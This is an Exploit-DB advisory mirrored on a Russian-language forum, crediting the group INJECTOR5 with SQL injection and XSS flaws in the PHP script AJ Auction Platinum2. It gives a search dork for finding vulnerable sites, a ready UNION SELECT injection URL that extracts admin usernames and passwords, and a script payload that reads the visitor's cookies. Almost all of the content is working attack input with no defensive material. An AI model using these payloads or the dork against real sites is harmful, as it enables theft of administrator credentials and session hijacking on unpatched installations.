- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 6561
- Проверка EDB
-
- Пройдено
- Автор
- INJECTOR5
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6004 cve-2008-6003
- Дата публикации
- 2008-09-25
Код:
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ \___``\ |
| \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
| \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ \ \____/ |
| \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ \/___/ |
| \ \____/ >> Kings of injection |
| \/___/ |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Xss /Remote SQL injection
Script : Aj auction platinum2 , last version
Site : http://www.ajauctionpro.com
Dork : Powered By AJ Auction
Demo : http://www.ajauctionpro.com/ajauction_platinum2/
[ SQL injection ]
=========================================================================
EXP file: Script path /sellers_othersitem.php?seller_id=
SQL : -1%20union%20select%201,2,3,4,concat(user_name,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin--
[Xss]
=========================================================================
EXP : search.php?min_cur=&product="''<?>>""''<script>alert(document.cookie)</script>
=========================================================================
ShoutZ :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
thanx str0ke/*
# milw0rm.com [2008-09-25]
- Источник
- www.exploit-db.com